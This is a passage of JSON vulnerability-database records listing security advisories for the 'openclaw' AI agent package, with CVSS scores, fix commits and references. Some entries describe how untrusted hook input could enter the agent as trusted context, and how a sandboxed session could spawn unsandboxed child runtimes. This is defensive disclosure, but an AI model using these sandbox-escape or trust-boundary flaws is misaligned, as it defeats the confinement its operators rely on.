y":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["GHSA-jccr-rrw2-vc8h"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-zf3q-78js-k7ce"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89446?format=json","vulnerability_id":"VCID-zg68-u5b5-vkft","summary":"OpenClaw: Agent hook events could enqueue trusted system events from unsanitized external input\n## Summary\n\nAgent hook events could enqueue trusted system events from unsanitized external input.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nAgent hook dispatch could turn externally supplied hook metadata into trusted system events, allowing untrusted input to enter the agent as higher-trust context.\n\n## Technical Details\n\nThe fix sanitizes hook names and marks agent hook system events as untrusted before enqueueing them.\n\n## Fix\n\nThe issue was fixed in #64372. 
The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `e3a845bde5b54f4f1e742d0a51ba9860f9619b29`\n- PR: #64372\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43534","reference_id":"","reference_type":"","scores":[{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.05997","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00023","scoring_system":"epss","scoring_elements":"0.06623","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00023","scoring_system":"epss","scoring_elements":"0.06635","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43534"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/e3a845bde5b54f4f1e742d0a51ba9860f9619b29","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_sys
tem":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-05-06T14:12:17Z/"}],"url":"https://github.com/openclaw/openclaw/commit/e3a845bde5b54f4f1e742d0a51ba9860f9619b29"},{"reference_url":"https://github.com/openclaw/openclaw/pull/64372","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/64372"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-7g8c-cfr3-vqqr","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-05-06T14:12:17Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-7g8c-cfr3-vqqr"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43534","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE",
"scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43534"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-unsanitized-external-input-in-agent-hook-events","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"6.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-05-06T14:12:17Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-unsanitized-external-input-in-agent-hook-events"},{"reference_url":"https://github.com/advisories/GHSA-7g8c-cfr3-vqqr","reference_id":"GHSA-7g8c-cfr3-vqqr","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7g8c-cfr3-vqqr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109896?format=json","purl":"pkg:npm/openclaw@2026.4.10","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6cfj-zugb-7uhq"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"
vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hphn-8fnj-qkh2"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-q3a2-qk5j-1yat"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10"}],"aliases":["CVE-2026-43534","GHSA-7g8c-cfr3-vqqr"],"risk_score":4.2,"exploitability":"0.5","weighted_severity":"8.4","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-zg68-u5b5-vkft"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91472?format=json","vulnerability_id":"VCID-zhpy-h2b2-ekd8","summary":"Duplicate Advisory: OpenClaw's sandboxed sessions_spawn now enforces sandbox inheritance for cross-agent spawns\n## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-p7gr-f84w-hqg5. 
This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw versions prior to 2026.3.1 fail to enforce sandbox inheritance during cross-agent sessions_spawn operations, allowing sandboxed sessions to create child processes under unsandboxed agents. An attacker with a sandboxed session can exploit this to spawn child runtimes with sandbox.mode set to off, bypassing runtime confinement restrictions.","references":[{"reference_url":"https://www.vulncheck.com/advisories/openclaw-sandbox-escape-via-cross-agent-sessions-spawn","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-sandbox-escape-via-cross-agent-sessions-spawn"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32048","reference_id":"CVE-2026-32048","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32048"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-p7gr-f84w-hqg5","reference_id":"GHSA-p7gr-f84w-hqg5","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U
/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-p7gr-f84w-hqg5"},{"reference_url":"https://github.com/advisories/GHSA-wr92-6w3g-2hwc","reference_id":"GHSA-wr92-6w3g-2hwc","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-wr92-6w3g-2hwc"}],"fixed_packages":[],"aliases":["GHSA-wr92-6w3g-2hwc"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-zhpy-h2b2-ekd8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89363?format=json","vulnerability_id":"VCID-zkum-rn42-yyfs","summary":"OpenClaw: Discord voice manager bypasses channel-level member access allowlist\n## Summary\nDiscord voice manager bypasses channel-level member access allowlist\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: medium\n- Assessment: v2026.3.28 still accepts Discord voice ingress before channel allowlist authorization, and main-only gating means this remains a real shipped access-control bug.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `dba96e7507e0900f120e5e28e57755d69bf78759` — 2026-03-31T21:29:13+09:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @zsxsoft for 
reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41381","reference_id":"","reference_type":"","scores":[{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10395","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10436","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.10417","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41381"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/dba96e7507e0900f120e5e28e57755d69bf78759","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:29:48Z/"}],"url":"https://github.com/openclaw/openclaw/commit/dba96e7507e0900f120e5e28e57755d69bf78759"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"MODERATE","scoring_system"
:"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cqgw-44wg-44rf","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:29:48Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cqgw-44wg-44rf"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41381","reference_id":"CVE-2026-41381","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41381"},{"reference_url":"https://github.com/advisories/GHSA-cqgw-44wg-44rf","reference_id":"GHSA-cqgw-44wg-44rf","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cqgw-44wg-44rf"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-access-control-bypass-in-discord-voice-manager-via-channel-allowlist","reference_id":"openclaw-access-control-bypass-in-discord-voice-manager-via-channel-allowlist","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv
2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:29:48Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-access-control-bypass-in-discord-voice-manager-via-channel-allowlist"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},
{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},
{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41381","GHSA-cqgw-44wg-44rf"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-zkum-rn42-yyfs"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89142?format=json","vulnerability_id":"VCID-zpb1-e3g9-vkbh","summary":"OpenClaw: Unbound bootstrap setup codes allow privilege escalation during pairing\n## Summary\nBootstrap setup codes were not bound to the intended device role and scopes, allowing first-use privilege escalation during pairing.\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: high\n- Assessment: Real first-use bootstrap privilege-escalation bug fixed and shipped in v2026.3.22+, so keep open for publication with current severity.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.13-1`\n- Patched versions: `>= 2026.3.22`\n- First stable tag containing the fix: `v2026.3.22`\n\n## Fix Commit(s)\n- `a600c72ed7d0045a27f58bf031d2b36ecb0141c9` — 2026-03-22T23:57:15-07:00\n\nOpenClaw thanks @tdjackey for 
reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41386","reference_id":"","reference_type":"","scores":[{"value":"0.00044","scoring_system":"epss","scoring_elements":"0.1385","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00044","scoring_system":"epss","scoring_elements":"0.13886","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00044","scoring_system":"epss","scoring_elements":"0.13882","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41386"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:H/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/a600c72ed7d0045a27f58bf031d2b36ecb0141c9","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:H/SA:N"},{"value":"9.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-04-29T12:48:41Z/"}],"url":"https://github.com/openclaw/openclaw/commit/a600c72ed7d0045a27f58bf031d2b36ecb0141c9"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-
